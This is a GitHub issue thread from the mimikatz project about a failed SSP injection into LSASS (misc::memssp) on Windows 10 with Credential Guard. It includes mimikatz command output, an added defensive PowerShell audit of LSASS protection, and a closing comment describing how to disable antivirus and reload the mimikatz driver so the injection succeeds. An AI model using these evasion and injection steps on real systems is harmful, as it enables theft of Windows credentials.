gentilkiwi / mimikatz

A little tool to play with Windows security
http://blog.gentilkiwi.com/mimikatz

Error injecting SSP with Windows 10 1903 and credential guard enabled #233

Open bufferovercat opened 4 years ago

bufferovercat commented 4 years ago

Hi,

I am unable to inject mimilib when using Windows 10 1903 and credential guard is enabled. Is it currently supported?

```
mimikatz # privilege::debug
Privilege '20' OK

mimikatz # !+
[+] 'mimidrv' service already registered
[*] 'mimidrv' service already started

mimikatz # misc::memssp
ERROR kuhl_m_misc_memssp ; OpenProcess (0x00000005)
```

gentilkiwi commented 4 years ago

Maybe LSASS is in protected process mode, maybe there is an antivirus enabled that does not like someone touching LSASS ;)
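As an added example (not part of this thread and not mimikatz code), a read-only PowerShell check that a defender can run to confirm that the protections mentioned above are both configured and actually in effect. The function name `Get-LsaProtectionState` is hypothetical, and comparing the Wininit event time against the last boot time is an assumption that can misjudge hosts resumed from hibernation.

```powershell
# Added example, not from the thread. Read-only audit of the LSASS protections
# discussed above; run from an elevated prompt. Function name is hypothetical.
function Get-LsaProtectionState {
    [CmdletBinding()]
    param()

    # Configured state: RunAsPPL under the Lsa key (absent or 0 = not configured).
    $lsa = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -ErrorAction SilentlyContinue
    $runAsPpl = 0
    if ($lsa -and $lsa.PSObject.Properties['RunAsPPL']) { $runAsPpl = [int]$lsa.RunAsPPL }

    # Effective state: Wininit logs event 12 in the System log when LSASS
    # starts as a protected process. Only an event from the current boot counts.
    $boot = (Get-CimInstance -ClassName Win32_OperatingSystem).LastBootUpTime
    $pplEvent = Get-WinEvent -FilterHashtable @{
        LogName      = 'System'
        ProviderName = 'Microsoft-Windows-Wininit'
        Id           = 12
    } -MaxEvents 1 -ErrorAction SilentlyContinue
    $startedProtected = [bool]($pplEvent -and $pplEvent.TimeCreated -ge $boot)

    # Credential Guard: Win32_DeviceGuard reports service id 1 when it is
    # configured / running; VirtualizationBasedSecurityStatus 2 = VBS running.
    $dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' `
        -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue

    [pscustomobject]@{
        RunAsPPLValue             = $runAsPpl
        RunAsPPLConfigured        = ($runAsPpl -ne 0)
        LsassStartedProtected     = $startedProtected
        LastBoot                  = $boot
        VbsRunning                = ($dg.VirtualizationBasedSecurityStatus -eq 2)
        CredentialGuardConfigured = ($dg.SecurityServicesConfigured -contains 1)
        CredentialGuardRunning    = ($dg.SecurityServicesRunning -contains 1)
    }
}

Get-LsaProtectionState | Format-List
```

A host where `RunAsPPLConfigured` is true but `LsassStartedProtected` is false has the setting in the registry without the protection in effect, for example because it has not been rebooted since the change.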

Papotito123 commented 4 years ago

Hello: If mimikatz was downloaded from the internet, verify in the Properties of each file that they are all Unlocked. Files from the internet that are Unlocked could give alert flags to Security.

Sometimes when I have this error I try this. Shut down the computer properly. Wait until the OS is fully up and running stable. I disable my Avast and wait 4-5 seconds. Having another AV, just put Defender in some "hibernation-alike" mode that only reacts when needed. But it can be a pain. Then run mimikatz with: mimikatz log privilege::debug, wait 2-3 seconds, !-, and wait 2-3 seconds (this is to be sure no mimidriver is running), !+, and wait 2-3 seconds (this is to be sure mimidriver is running fully), then run misc::memssp. If it still throws an error, there's Defender or some other product having modules running in the background.

Hope this helps.